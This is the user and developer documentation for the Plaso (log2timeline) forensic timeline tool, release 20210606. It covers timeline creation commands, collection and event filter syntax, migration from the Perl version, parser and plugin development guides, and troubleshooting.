Plaso (Log2timeline) Release 20210606

Plaso (log2timeline) Release 20210606

unknown

Jul 09, 2021

CONTENTS

1 User documentation 3 1.1 User’s Guide...... 3 1.1.1 How to get started...... 3 1.1.2 Installing the packaged release...... 3 1.1.3 Before we start...... 3 1.1.4 The tools...... 4 1.2 Creating a timeline...... 5 1.2.1 Using psteal...... 5 1.2.2 Using log2timeline and psort...... 5 1.3 Collection Filters...... 5 1.3.1 Using Forensic Artifacts definitions...... 5 1.3.2 Using filter files...... 6 1.3.3 References...... 7 1.4 Event filters...... 7 1.4.1 How do event filters work...... 8 1.4.2 Example event filter expressions...... 8 1.4.3 Value type helpers...... 9 1.4.4 References...... 9 1.5 Analysis Plugins...... 9 1.6 Tips and Tricks...... 9 1.6.1 Import the output of a third party tool into Plaso...... 10 1.7 Switching from Log2Timeline Perl (Legacy) to Plaso...... 10 1.7.1 Old method...... 10 1.7.2 New method...... 11

2 Developer documentation 15 2.1 Developer Guide...... 15 2.1.1 Setting up and maintaining your development environment...... 15 2.1.2 Getting Started...... 15 2.1.3 Design...... 16 2.1.4 Roadmap...... 16 2.1.5 Contributing Code...... 16 2.2 Style Guide...... 17 2.2.1 Plaso specific style points...... 17 2.3 How to write a parser...... 18 2.3.1 Introduction...... 18 2.3.2 Format...... 19 2.3.3 Parsers vs. Plugins...... 19 2.3.4 Test data...... 19 2.3.5 Parsers, formatters, events and event data...... 19

i 2.4 How to write a parser plugin...... 21 2.5 How to write an analysis plugin...... 21 2.5.1 Create file and class...... 21 2.5.2 Write minimal tests...... 21 2.5.3 Develop plugin...... 22 2.5.4 Expand tests...... 22 2.5.5 Register classes...... 22 2.5.6 Code review/submit...... 22 2.6 How to write an output module...... 22 2.6.1 Create file and class...... 22 2.6.2 Write minimal tests...... 22 2.6.3 Develop plugin...... 23 2.6.4 Expand tests...... 23 2.6.5 Register classes...... 23 2.6.6 Code review/submit...... 23

3 Troubleshooting 25 3.1 Quick list...... 25 3.1.1 Performance related issues...... 26 3.2 Isolating errors...... 26 3.3 Producing debug logs...... 27 3.4 Import errors...... 27 3.5 Crashes, hangs and tracebacks...... 27 3.5.1 A worker segfault-ing...... 28 3.5.2 A worker gives a killed status...... 28 3.5.3 Which processes are running...... 28 3.5.4 Analyzing crashes with single process and debug mode...... 28 3.5.5 Analyzing crashes with gdb...... 29 3.6 High memory usage...... 29 3.7 MacOS specific issues...... 30 3.7.1 How do I remove a Plaso installation...... 30 3.7.2 PyParsing errors...... 30 3.7.3 ImportError: cannot import name dependencies...... 30 3.7.4 You used pip without virtualenv and have messed up your site-packages...... 30 3.8 Ubuntu Linux specific issues...... 30 3.8.1 Origin of an installed package...... 30 3.9 Windows specific issues...... 30 3.9.1 Not a valid Win32 application...... 30 3.9.2 Unable to find an entry point in DLL...... 31 3.9.3 setup.py and build errors...... 31

4 Supported Formats 33 4.1 Storage media image file formats...... 33 4.2 Volume system formats...... 33 4.3 File system formats...... 33 4.4 File formats...... 33 4.5 Bencode file formats...... 35 4.6 Browser cookie formats...... 35 4.7 Compound ZIP file formats...... 35 4.8 ESE database file formats...... 35 4.9 OLE Compound File formats...... 35 4.10 Property list (plist) formats...... 35 4.11 SQLite database file formats...... 36 4.12 Syslog file formats...... 37 ii 4.13 Windows Registry formats...... 37 4.14 Hashers Supported...... 38

5 plaso package 39 5.1 Subpackages...... 39 5.1.1 plaso.analysis package...... 39 5.1.2 plaso.analyzers package...... 54 5.1.3 plaso.cli package...... 62 5.1.4 plaso.containers package...... 97 5.1.5 plaso.engine package...... 122 5.1.6 plaso.filters package...... 154 5.1.7 plaso.formatters package...... 167 5.1.8 plaso.lib package...... 178 5.1.9 plaso.multi_process package...... 186 5.1.10 plaso.output package...... 195 5.1.11 plaso.parsers package...... 211 5.1.12 plaso.preprocessors package...... 469 5.1.13 plaso.serializer package...... 478 5.1.14 plaso.single_process package...... 479 5.1.15 plaso.storage package...... 480 5.1.16 plaso.unix package...... 504 5.1.17 plaso.winnt package...... 504 5.2 Submodules...... 505 5.3 plaso.dependencies module...... 505 5.4 Module contents...... 505

6 Indices and tables 507

Python Module Index 509

Index 515

iii iv Plaso (log2timeline), Release 20210606

Plaso (Plaso Langar Að Safna Öllu), or super timeline all the things, is a Python-based engine used by several tools for automatic creation of timelines. Plaso default behavior is to create super timelines but it also supports creating more targeted timelines. These timelines support digital forensic investigators/analysts, to correlate the large amount of information found in logs and other files found on an average computer. The source code is available from the project page.

CONTENTS 1 Plaso (log2timeline), Release 20210606

2 CONTENTS CHAPTER ONE

USER DOCUMENTATION

1.1 User’s Guide

1.1.1 How to get started

First determine which version of Plaso is must suitable to your needs, for more information see Releases and roadmap

1.1.2 Installing the packaged release

To get Plaso up and running quickly: • Docker for Linux, Mac OS and Windows. Alternative options: • Fedora • MacOS • Ubuntu If you run into problems installing, check out the installation troubleshooting guide

1.1.3 Before we start

Please report all discovered bugs on the issue tracker. To follow announcements from the Plaso team or send in generic inquiries or discuss the tool: • subscribe to the log2timeline-discuss mailing list. • join the Plaso channel part of the open-source-dfir Slack community, more information can be found here.

I know the good old Perl version

If you are one of those people that liked the old Perl version of log2timeline but really would like to switch use all the nifty features of the Python version. Fear not, here is a guide to help you migrate.

3 Plaso (log2timeline), Release 20210606

1.1.4 The tools

Though Plaso initially was created in mind to replace the Perl version of log2timeline, its focus has shifted from a stand-alone tool to a set of modules that can be used in various use cases. Fear not Plaso is not a developers only project it also includes several command line tools, each with its specific purpose. Currently these are: • image_export • log2timeline • pinfo • psort • psteal Note that each tool can be invoked with the -h or --help command line flag to display basic usage and command line option information. image_export image_export is a command line tool to export file content from a storage media image or device based on various filter criteria, such as extension names, filter paths, file format signature identifiers, file creation date and timeranges, etc. log2timeline log2timeline is a command line tool to extract events from individual files, recursing a directory (e.g. mount point) or storage media image or device. log2timeline creates a Plaso storage file which can be analyzed with the pinfo and psort tools. The Plaso storage file contains the extracted events and various metadata about the collection process alongside information collected from the source data. It may also contain information about tags applied to events and reports from analysis plugins. pinfo pinfo is a command line tool to provide information about the contents of a Plaso storage file. psort psort is a command line tool to post-process Plaso storage files. It allows you to filter, sort and run automatic analysis on the contents of Plaso storage files. psteal psteal is a command line tool that combines the functionality of log2timeline and psort.

4 Chapter 1. User documentation Plaso (log2timeline), Release 20210606

1.2 Creating a timeline

1.2.1 Using psteal

The quickest way to generate a timeline with Plaso is using the “psteal” frontend. For example: psteal.py--source image.raw-o dynamic-w registrar.csv

This will produce a CSV file containing all the events from an image, with some sensible defaults.

1.2.2 Using log2timeline and psort

Alternatively you can use “log2timeline” and “psort”. For example: log2timeline.py --storage-file timeline.plaso image.raw psort.py -o dynamic -w registrar.csv timeline.plaso

1.3 Collection Filters

When you know beforehand which files are relevant for your analysis and which files not, you can use collection filters to instruct Plaso to only collect events from these files. This is also referred to as targeted collection. Plaso supports the following methods of targeted collection: • Using Forensic Artifacts definitions • Using filter files Note that at the moment the different collection filters cannot be used simultaneously.

1.3.1 Using Forensic Artifacts definitions

Forensic Artifacts definitions provide a more analyst centric approach to collection filters. For example based on the definition: name: WindowsEventLogSystem doc: System Windows Event Log. sources: - type: FILE attributes: paths: ['%%environ_systemroot%%\System32\winevt\Logs\SysEvent.evt'] separator: '\' conditions: [os_major_version<6] labels: [Logs] supported_os: [Windows] urls: ['https://forensicswiki.xyz/wiki/index.php?title=Windows_Event_Log_(EVT)']

‘WindowsEventLogSystem’ refers to the path ‘%SystemRoot%\System32\winevt\Logs\SysEvent.evt’. To use:

1.2. Creating a timeline 5 Plaso (log2timeline), Release 20210606

log2timeline.py --artifact-filters WindowsEventLogSystem --storage-file timeline.plaso␣

˓→source.raw

Note that for convenience the Forensic Artifacts definition names can also be stored in afile.

1.3.2 Using filter files

Due a limitations in the original text-based filter file format the YAML-based filter format was introduced. Werecom- mend using the YAML-based format. A YAML-based filter can be used to describe the path of each file or directory Plaso should include orexcludefrom parsing. • Inclusion filters are applied before exclusion filters. • Specifying the path of a directory will include or exclude its files and subdirectories. Path filters are case sensitive when compared to a case sensitive file system and case insensitive when comparedtoa case insensitive file system. To use: log2timeline.py --file-filter windows.yaml --storage-file timeline.plaso source.raw

Text-based filter file format

A text-based filter can be used to describe the path of each file or directory Plaso should include inparsing. Note that the text-based filter file does not support exclusion filters. If you need this functionality usetheYAML- based filter file instead. The text-based filter file itself contains a path filter per line or a linestarting # for comment. # This is comment. / segment1/ segment2/ segment3/... {systemroot}/ segment2/ segment3/...

The path segment separator is a forward slash ‘/’. A path segment can be defined as • a string representing the exact name of the directory or file; • a regular expression representing the name of the directory or file; • a path expansion variable, denoted by a curly bracket, such as {systemroot}. The path must be an absolute path, meaning that is should start with ‘/’ or with path expansion variable that Plaso was able to resolve during preprocessing. Plaso will ignore path filters it does not consider valid. For example: {systemroot}/System32/config/.+[.]evt /(Users|Documents And Settings)/.+/AppData/Roaming/Mozilla/Firefox/Profiles/.+/places.

˓→sqlite

6 Chapter 1. User documentation Plaso (log2timeline), Release 20210606

The first line defines a path filter that uses the “systemroot” path expansion variable that is discovered duringprepro- cessing and denotes the Windows SytemRoot folder. It will then process the directories and files with a name that endswith “.evt”. The second line defines a path filter using both regular expressions and strings to denote the location of Firefox history files.

YAML-based filter file format

A YAML-based filter can be used to describe the path of each file or directory Plaso should include orexcludefrom parsing. Include filters have precedence above exclude filters. A path filter is defined as a set of attributes: • “description”; optional description of the purpose of the path filter; • “paths”: one or more paths to filter defined as a regular expression; • “path_separator”; optional path segment separator, which is ‘/’ by default; • “type”; required filter type either “include” or “exclude”; For example: description: Windows Event Log files. type: include path_separator: '\' paths: - '%SystemRoot%\\System32\\config\\.+[.]evt' --- description: Exclude Linux binaries. type: exclude paths: - '/usr/bin'

Note that if you use \ as a path segment separator it must be escaped as part of the regular expression.

1.3.3 References

• Forensic artifacts • Targeted Timeline Collection

1.4 Event filters

Event filters are used to: • selectively export events; • selectively analyze events; • apply a label to events in the tagging analysis module. Tools that have event filter support: • psort

1.4. Event filters 7 Plaso (log2timeline), Release 20210606

1.4.1 How do event filters work

An event filter is constructed in the following way: EXPRESSION BOOLEAN_OPERATOR EXPRESSION

Where each expression is: ATTRIBUTE [not] OPERATOR [not] VALUE

Each expression can also be a collection of binary expressions and operators enclosed in a parenthesis. EXPRESSION BOOLEAN_OPERATOR (EXPRESSION BINARY_OPERATOR EXPRESSION)

The following boolean operators are supported: • and • or • && (and) • || (or) The following keywords are available: And for negative matching the keyword “not” in front of any of these keywords is also supported. That is to say if each of these operators is preceded with the keyword “not” a negative matching is performed. Note that as of 20190512 special event attributes like ‘message’, ‘source’, ‘source_short’, ‘source_long’ and ‘sourcetype’ are considered part of the output and are no longer expanded in the event filter.

1.4.2 Example event filter expressions parser is 'syslog' and body contains 'root'

This event filter applies to all events where: • the event was produced by the parser named ‘syslog’ (case sensitive) and; • the body attribute contains the substring ‘root’ (case insensitive). Use “log2timeline –info” to retrieve a list of the names of all the available parsers. Or use the pinfo.py timeline. plaso to see a list of all parsers that were used to produce the output in the storage file. parser contains 'firefox' AND pathspec.vss_store_number>0

• The parser name contains the word “firefox”; • The event was extracted from a Volume Shadow Snapshot (VSS).

8 Chapter 1. User documentation Plaso (log2timeline), Release 20210606

1.4.3 Value type helpers

As of 20201123 value type helpers were introduced to ensure certain types are handled consistently. The following value type helpers are currently supported: • Date and time value helper

Date and time value helper

The date and time value helper is: DATETIME(int|str)

It supports 2 different types of arguments, either: • an integer containing a POSIX timestamp in microseconds • an ISO 8601 date and time string. Note that more common forms of ISO 8601 string are supported but all. The maximum supported granularity is microseconds. For exeample: DATETIME(0) DATETIME("2020-12-23T12:34:56.789")

1.4.4 References

• log2timeline filtering 101

1.5 Analysis Plugins

• nsrlsvr • tagging • viper • virustotal

1.6 Tips and Tricks

This is a collection of few tips and tricks that can be used with Plaso

1.5. Analysis Plugins 9 Plaso (log2timeline), Release 20210606

1.6.1 Import the output of a third party tool into Plaso

If want to import the output of a third party tool into your Plaso timeline export it to bodyfile (or mactime) format. The Plaso mactime parser can parse a bodyfile. Note that the bodyfile format has numerous limitations see: ForensicsWiki: Bodyfile The Plaso mactime parser supports timestamps with a fraction of a second since Aug 25, 2020.

1.7 Switching from Log2Timeline Perl (Legacy) to Plaso

This page contains information for those that are used to using the 0.x version of log2timeline, also known as Log2Timeline Perl or Log2Timeline legacy. The syntax has changed somewhat from the 0.x version, the largest differences may be: • The output of the tool is no longer controllable through the log2timeline.py command line tool (or front-end). There is only one storage mechanism and that is the Plaso storage file. To produce an output file comparable withe the 0.x version you’ll need to run the psort.py command line tool with l2t_csv output module. • The log2timeline.py command line tool can extract events directly from storage media images, such as raw or E01. Removing the need to manually mounting these images. • The names of the parser have changed. There are a numerous new parsers, but note that some of the older parsers have not been ported. • The post-processing tool is no longer called l2t_process, it is now named psort.py. • The command line parameters and options have changed considerably. More information below. In the information below the name Plaso is the name of the new back-end as opposed to Log2Timeline which is the old Perl back-end. log2timeline.py is a CLI tool (or front-end). There are other front-ends to the tool though, for example Timesketch. Let’s go over the old and new method of collecting a timeline from a raw storage media image file.

1.7.1 Old method

First of all we needed to mount the image. Something like this: sudo mount -t ntfs-3g -o ro,nodev,noexec,show_sys_files,streams_interface=windows,loop,

˓→offset=32256 image.dd /mnt/nfts

Then we needed to run log2timeline against the mount point. You needed to define the timezone of the suspect image, which could get overwritten if a correct value was found and you needed to define which parsers to use. The sample run is: cd /mnt/ntfs log2timeline -r -p -z CST6CDT -f win7 . > /cases/timeline/myhost.csv2> /cases/timeline/

˓→myhost.log

This would pick all the parsers defined in the “win7” list and run those against every file found in the mount point.A list of all available parsers and lists could be produced by running: log2timeline -f list

10 Chapter 1. User documentation Plaso (log2timeline), Release 20210606

As noted earlier, the above approach would produce a large “kitchen-sink” approach timeline that is not sorted. To sort that one (no filtering): cd /cases/timeline l2t_process.py -b myhost.csv > myhost.sorted.csv

Now we would have a large sorted CSV file ready to analyze. Limiting the output to a specific date could be achieved using methods like: l2t_process.py -b myhost.csv 10-10-2012..10-11-2012

However, you could not limit the output of the timeline to a more narrow timeframe than a single day, for that you needed grep (or some other tools of choice). l2t_process.py -b myhost.csv 10-10-2012..10-11-2012 | grep ",1[8-9]:[0-5][0-9]:[0-9][0-

˓→9],"

And filtering based on content was constrained to few options: • Use a keyword file that contained case-insensitive regular expressions to include or exclude events. • Use a YARA rule that matched against the description_long field. • Use grep/sed/awk. The problem with most of the l2t_process filtering is that it was either done on the whole line or against the descrip- tion_long field. There was no easy way to filter against a more specific attribute oftheevent.

1.7.2 New method

Since the new version works directly on a raw image file there is no need to mount the image first (and mounting them is actually highly discouraged), the timeline can be created in a single step: log2timeline.py --storage-file /cases/timeline/timeline.plaso image.dd

The tool will detect whether or not the input is a file, directory or a disk image/partition. If the tool requires additional information, such as when VSS stores are detected or more than a single partition in the volume the tool will ask for additional details. An example of that: The following Volume Shadow Snapshots (VSS) were found: Identifier VSS store identifier Creation Time vss1 23b509aa-3499-11e3-be88-24fd52566ede 2013-10-16T13:18:01.685825+00:00 vss28dfc93b3-376f-11e3-be88-24fd52566ede 2013-10-18T00:28:29.120593+00:00 vss3 dc8ffcf4-3a6b-11e3-be8a-24fd52566ede 2013-10-21T19:24:50.879381+00:00

Please specify the identifier(s) of the VSS that should be processed: Note that a range of stores can be defined as: 3..5. Multiple stores can be defined as:1,3,5 (a list of comma separated values). Ranges and lists can also be combined as:1,3..5. The first store is 1. If no stores are specified none will be processed. You can abort with Ctrl^C.

The options can also be supplied on the command line, --vss_stores '1,2' for defining the VSS stores to parse, or --no-vss or -vss-stores all for processing all VSS stores. This can be achieved without calculating the offset into the disk image.

1.7. Switching from Log2Timeline Perl (Legacy) to Plaso 11 Plaso (log2timeline), Release 20210606

log2timeline.py --partitions2 --storage-file /cases/timeline/timeline.plaso image.dd

First of all there is quite a difference in the number of parameters, let’s go slightly over them: • There is no -r for recursive, when the tool is run against an image or a directory recursive is automatically assumed, run it against a single file and it recursion is not turned on. • There is no need to supply the tool with the -p (preprocessing) when run against an image, that is automatically turned on. • The -z CST6CDT is not used here. The tool does automatically pick up the timezone and use that. However in the case the timezone is not identified the option is still possible and in fact if not provided uses UTCasthe timezone. • You may have noticed there is no -f list parameter used. The notion of selecting filters is now removed and is done automatically. The way the tool now works is that it tries to “guess” the OS and select the appropriate parsers based on that selection. The categories that are available can be found here or by issuing log2timeline.py --info. If you want to overwrite the automatic selection of parsers you can define them using the --parsers parameter. • You have to supply the tool with the parameter to define where to save the output (can no longer just output to STDOUT and pipe it to a file). The equivalent call of the old tool of -f list can now be found using --info. That will print out all available parsers and plugins in the tool. One thing to take note of is the different concepts of either plugins or parsers. In the oldtool there was just the notion of a parser, which purpose it was to parse a single file/artifact. However Plaso introduces both plugins and parsers, and there is a distinction between the two. The parser understands and parses file formats whereas a plugin understands data inside file formats. So in the case of the Windows Registry the parser understands the file format of the registry and parses that, but it’s the purpose of a plugin to read the actual key content andproduce meaningful data of it. The same goes with SQLite databases, the parser understands how to read SQLite databases while the plugins understand the data in them, an example of a SQLite plugin is the Chrome History plugin, or the Firefox History plugin. Both are SQLite databases so the use the same parser, but the data stored in them is different, thus we need a plugin for that. To see the list of presets that are available use the --info parameter. The old tool allowed you to indicate which presets you wanted using the -f parameter. In the new version this same functionality is exposed as the --parsers parameter. Example usage of this parameter is: log2timeline.py --parsers "win7" --storage-file /cases/timeline/timeline.plaso image.dd log2timeline.py --parsers "win7,\!winreg" --storage-file /cases/timeline/timeline.plaso␣

˓→image.dd log2timeline.py --parsers "winreg,winevt,winevtx" --storage-file /cases/timeline/

˓→timeline.plaso image.dd

There is another difference, the old tool used l2t_csv as the default output, which could be configured usingthe -o parameter of log2timeline. This output was all saved in a single file that was unsorted, which meant that a post- processing tool called l2t_process needed to be run to sort the output and remove duplicate entries before analysis started (you could however immediately start to grep the output). log2timeline.py does not allow you to control the output, there is only one available output and that is the Plaso storage file. The Plaso storage file contains additional metadata about the how log2timeline.py was run, information gathered during pre-processing, warnings about data that could not be parser and other useful information that could not be stored in the older format. The downside of the storage format is that you can no longer immediately start to grep or analyze the output of the tool, now you need to run a second tool to sort, remove duplicates and change it into a human readable format.

12 Chapter 1. User documentation Plaso (log2timeline), Release 20210606

psort.py -w /cases/timeline/myhost.sorted.csv /cases/timeline/timeline.plaso

There is a command line tool psteal.py which runs log2timeline.py and psort.py in a single invocation. With the new storage format and the filtering possibilities of psort, many new things are now available that werenot possible in the older version. For instance the possibility to scope the time windows of the output to few minutes: psort.py /cases/timeline/timeline.plaso "date > '2012-10-10 18:24:00' and date < '2012-

˓→10-10 22:25:19'"

Or to a specific dataset: psort.py /cases/timeline/timeline.plaso "date > '2012-10-10 12:00:00' and date < '2012-

˓→10-10 23:55:14' and message contains 'evil' and (source is 'LNK' or timestamp_desc␣

˓→iregexp 'st\swr' or filename contains 'mystery')"

Or to just present a small time slice based on a particular event of interest: psort.py --slice "2012-10-10T12:00:00" /cases/timeline/timeline.plaso

More information about event filters can be found here. The main difference between the old branch and the new one is that now filtering is a lot more granular, andalsovery different. It is possible to filter against every attribute that is stored inside the event. Some types of events willstore certain attributes, while others will not. psort.py /cases/timeline/timeline.plaso "username contains 'joe'"

Filter like this one above will go through every event and only include those events that actually have the attribute username set, which may not be nearly everyone (only those events that can positively attribute an event to a specific user). And then filter out those events even further by only including the events that contain the letters “joe”(case insensitive). The most common usage of the filters will most likely be constrained to the common fields, like source/source_short, date/timestamp, source_long, message, filename, timestamp_desc, parser, etc. For now, the new version does not have some of the capabilities that the older version had, that is to say the: • Yara rules to filter out content. • Inclusion/exclusion regular expressions. These are things that are on the roadmap and should hopefully be added before too long. Another new thing that the older version did not have is metadata stored inside the storage file. Since the older version only used l2t_csv as the output (default output, configurable) it had no means of storing metadata about the runtimeof the tool nor the events that were collected. That has changed with the new version. Some of the metadata stored can be used for filtering out data (or has the potential of being used for that) or at least be printed out again, since itcontains useful information about the collection. pinfo.py -v /cases/timeline/timeline.plaso

This tool will show metadata information that is stored inside the storage file, so you can see what is exactly stored inside there. The storage may also contain additional details, such as; tags for events, analysis reports and other data. Another aspect that was not part of the older version is tagging and any other sort of automatic analysis on the data set. For more information see: tagging rules.

1.7. Switching from Log2Timeline Perl (Legacy) to Plaso 13 Plaso (log2timeline), Release 20210606

14 Chapter 1. User documentation CHAPTER TWO

DEVELOPER DOCUMENTATION

2.1 Developer Guide

• Setting up and maintaining your development environment • Getting Started • Design • Roadmap • Contributing Code

2.1.1 Setting up and maintaining your development environment

The first challenge you will encounter is setting up and maintaining your development environment. Start by setting up a development environment: • Development environment in a VirtualEnv • Development environment on Fedora • Development environment on MacOS • Development environment on Ubuntu • Development environment on Windows

2.1.2 Getting Started

Once you’ve set up your development environment we recommend start simple: • How to write a parser • How to write a parser plugin • How to write an analysis plugin • How to write an output module • How to write a tagging rule

15 Plaso (log2timeline), Release 20210606

2.1.3 Design

Overview of the general architecture of Plaso: • Architecture • API documentation

2.1.4 Roadmap

A high level roadmap can be found here. Individual features are tracked as a github issue and labeled as “enhancement”. A list of features we’d already like to add can be found here.

2.1.5 Contributing Code

Want to add a parser to Plaso and you are ready to go? Start by checking here if someone is already working on it. If you don’t see anything there you can just go ahead and create an issue on the github site and mark it as “enhancement”. Assign the issue to yourself so that we can keep track on who is working on what. If you cannot program and still have a great idea for a feature please go ahead and create an issue and leave it unassigned, note that the priority will be who ever wants to work on it. Before you start writing code, please review the following: • Style guide. All code submitted to the project needs to follow this style guide. • Code review. All code that is submitted into the project is reviewed by at least one other person. • Adding a new dependency. If your code requires adding a new dependency please check out these instructions.

Before you submit your first code review

1. Join the development mailing list: [email protected] and Slack channel, we recommend using the same account as step 1 2. Install the required development tools like pylint and python-mock 3. Make sure to run all the tests in the Plaso codebase, and that they successfully complete in your development environment 4. Make sure your development environment is set up correctly so that you can develop and test correctly. 5. Make sure your email address and name are correctly set in git. You can use the following commands: git config-- global user.name"Full Name" git config-- global user.email [email protected] git config-- global push.default matching

Use git config -l to see your current configuration.

16 Chapter 2. Developer documentation Plaso (log2timeline), Release 20210606

Core features changes

Sometimes you need to make some change to the core of the Plaso codebase. In those cases we ask that contributors first create a short design proposal explaining the rationale behind the change. The design doc needs tocontain: 1. A description of the problem you are facing 2. A list of the objectives of the change 3. A discussion of what’s in scope and what’s not 4. A description of your proposed the solution The preferred way of creating these design docs is to use Google Docs and send the link to the development mailing list so that it can be discussed further before starting to implement the code.

Tests

Tests are part of a maintainable code base. Code without sufficient test is very likely to be broken by alarge rewrite/refactor. Plaso has specific guidelines for writing tests: Style guide - tests

2.2 Style Guide

Plaso follows the log2timeline style guide.

2.2.1 Plaso specific style points

Event data attribute containers

Data types

Every event data attribute container defines a data type (DATA_TYPE). Conventions for the data type names are: 1. If the data type is operating system (or operating system convension such as POSIX) specific start with the name of operating system or convention. Currently supported prefixes: • android • chromeos • ios • linux • macos • windows Otherwise skip the operating system prefix. 1. Next is the name of the application, sub system or data format for example ‘chrome’, ‘windows:registry’ or ‘windows:evtx’. TODO: describe which one is preferred and why.

2.2. Style Guide 17 Plaso (log2timeline), Release 20210606

1. What follows are application, sub system or data format specific type information for example ‘windows:evtx:record’.

Value types

Values stored in an event data attribute container must be of certain types otherwise event filtering or output formatting can break. Supported Python types are: • bool (also see note below) • int • str A list, of the types previously mentioned types, are supported. Do not use dict or binary strings. Use a bool sparsely. For now it is preferred to preserve the original type. For example if -1 represents False and 0 True, store the value as an integer not as a bool. The message formatter can represent the numeric value as a human readable string.

Tests

• Use the test functions available in the local test_lib.py as much as possible nstead of writing your own test functions. If you think a test function is missing please add it, or mail the developer list to see if you can get someone else to do it. • Use self.CheckTimestamp for testing timestamp values. Common test code should be stored in “test library” files, for example. the parser test library is tests/parsers/ test_lib.py. We do this for a few reasons: • to remove code duplication in “boiler plate” test code; • to make the tests more uniform in both look-and-feel but also what is tested; • improve test coverage; • isolate core functionality from tests to prevent some future core changes affecting the parsers and plugins too much.

2.3 How to write a parser

2.3.1 Introduction

This page is intended to give you an introduction into developing a parser for Plaso. • First a step-by-step example is provided to create a simple binary parser for the Safari Cookies.binarycookies file. • At bottom are some common troubleshooting tips that others have run into before you. This page assumes you have at least a basic understanding of programming in Python and use of git.

18 Chapter 2. Developer documentation Plaso (log2timeline), Release 20210606

2.3.2 Format

Before you can write a binary file parser you will need to have a good understanding of the file format. A description of the Safari Cookies.binarycookies format can be found here.

2.3.3 Parsers vs. Plugins

Before starting work on a parser, check if Plaso already has a parser that handles the underlying format of the file you’re parsing. Plaso currently supports plugins for the following file formats: • Bencode • Compound zip files • Web Browser Cookies • ESEDB • OLECF • Plist • SQLite • Syslog • Windows Registry If the artifact you’re trying to parse is in one of these formats, you need to write a plugin of the appropriate type, rather than a parser. For our example, however, the Safari Cookies.binarycookies file is in its own binary format, so a separate parseris appropriate.

2.3.4 Test data

First we make a representative test file and add it to the test_data/ directory, in our example: test_data/Cookies.binarycookies

Make sure that the test file does not contain sensitive or copyrighted material.

2.3.5 Parsers, formatters, events and event data

• parser; a subclass of FileObjectParser that extracts events from the content of a file. • formatter (or event formatter); a subclass of EventFormatter which generates a human readable description of the event data. • event; a subclass of EventObject which represents an event • event data; a subclass of EventData which represents data related to the event.

2.3. How to write a parser 19 Plaso (log2timeline), Release 20210606

Writing the parser

Registering the parser

Add an import for the parser to: plaso/parsers/__init__.py

It should look like this: from plaso.parsers import safari_cookies

When plaso.parsers is imported this will load the safari_cookies module safari_cookies.py. The parser class BinaryCookieParser is registered using manager.ParsersManager. RegisterParser(BinaryCookieParser). plaso/parsers/safari_cookies.py

# -*- coding: utf-8 -*- """Parser for Safari Binary Cookie files."""

from plaso.parsers import interface from plaso.parsers import manager

class BinaryCookieParser(interface.FileObjectParser): """Parser for Safari Binary Cookie files."""

NAME= 'binary_cookies' DATA_FORMAT= 'Safari Binary Cookie file'

def ParseFileObject(self, parser_mediator, file_object,**kwargs): """Parses a Safari binary cookie file-like object.

Args: parser_mediator (ParserMediator): parser mediator. file_object (dfvfs.FileIO): file-like object to be parsed.

Raises: UnableToParseFile: when the file cannot be parsed, this will signal the event extractor to apply other parsers. """ ... manager.ParsersManager.RegisterParser(BinaryCookieParser)

20 Chapter 2. Developer documentation Plaso (log2timeline), Release 20210606

Writing the message formatter

The event message format is defined in data/formatters/*.yaml. For more information about the configuration file format see: message formatting

2.4 How to write a parser plugin

Writing a parser plugin is different depending on which parser you’re writing a plugin for. Parsers that support plugins are: • bencode • cookie • czip (Compound zip files) • esedb • olecf • plist • sqlite • syslog • winreg

2.5 How to write an analysis plugin

2.5.1 Create file and class

• Plugin file in plaso/analysis/ – Create an empty subclass of AnalysisPlugin – Register it with the analysis plugin by calling AnalysisPluginManager.RegisterPlugin • Test file in tests/analysis/ – Create an empty subclass of tests.analysis.test_lib.AnalysisPluginTestCase

2.5.2 Write minimal tests

• Write a test that loads your plugin • It will fail initially, but running the test while you’re developing your plugin gives you a quick way to see if your code is doing what you expect.

2.4. How to write a parser plugin 21 Plaso (log2timeline), Release 20210606

2.5.3 Develop plugin

• Implement your subclass of AnalysisPlugin • You’ll need to define/override: – NAME – ExamineEvent() – CompileReport() • You may also want to override: – URLS – ENABLE_IN_EXTRACTION, if your plugin is eligible to run while Plaso is extracting events.

2.5.4 Expand tests

• Add additional tests that test your plugin

2.5.5 Register classes

• Edit plaso/analysis/__init__.py to import your plugin in the correct alphabetical order.

2.5.6 Code review/submit

2.6 How to write an output module

2.6.1 Create file and class

• Plugin file in plaso/output/ – Create an empty subclass of plaso.output.interface.OutputModule – Register it with the output module manager by calling OutputManager.RegisterOutput • Test file in tests/output/ – Create an empty subclass of tests.output.test_lib.OutputModuleTestCase

2.6.2 Write minimal tests

• Write a test that loads your output module. • It will fail initially, but running the test while you’re developing your plugin gives you a quick way to see if your code is doing what you expect.

22 Chapter 2. Developer documentation Plaso (log2timeline), Release 20210606

2.6.3 Develop plugin

• Implement your subclass of plaso.output.interface.OutputModule • You’ll need to define/overwrite: – NAME – DESCRIPTION – WriteEventBody • You may also want to override: – Open() – Close() – GetMissingArguments() – WriteHeader() – WriteEventMACBGroup() – WriteFooter()

2.6.4 Expand tests

• Add additional tests that test your plugin

2.6.5 Register classes

• Edit plaso/output/__init__.py to import your plugin in the correct alphabetical order.

2.6.6 Code review/submit

• Create a PR to have the changes reviewed and merged with the main branch.

2.6. How to write an output module 23 Plaso (log2timeline), Release 20210606

24 Chapter 2. Developer documentation CHAPTER THREE

TROUBLESHOOTING

This page contains instructions that can be used to assist you in debugging potential issues with Plaso and its dependencies.

3.1 Quick list

1. Check the commit history and issue tracker if the bug has already been fixed; 2. If you are running the development release make sure Plaso and dependencies are up to date, see: Developers Guide 3. If you are experiencing an issue that cannot directly be attributed to some broken code e.g. the test are getting killed, check your system logs it might be a problem with resources available to Plaso; 4. Try to isolate the error, see below. If everything fails create a new issue on the issue tracker. Please provide as much detailed information as possible, keep in mind that: • we cannot fix errors based on vague descriptions; • we cannot look into your thoughts or on your systems; • we cannot easily isolate errors if you keep changing your test environment. Hence please provide us with the following details: • What steps will reproduce the problem? – What output did you expect? – What do you see instead? • The output of log2timeline.py --troubles, which provide: – The Python version including operating system and architecture – The path to plaso/log2timeline – The version of plaso/log2timeline – Information about dependencies • Are you processing a storage media image, if so which format, a directory or on an individual file? • Were you able to isolate the error to a specific file? Is it possible to share the file with the developer? • Any additional information that could be of use e.g. build logs, error logs, debug logs, etc.

25 Plaso (log2timeline), Release 20210606

Note that the github issue tracker uses markdown and thus please escape blocks of error output accordingly. Also see the sections below on how to troubleshoot issues of a specific nature.

3.1.1 Performance related issues

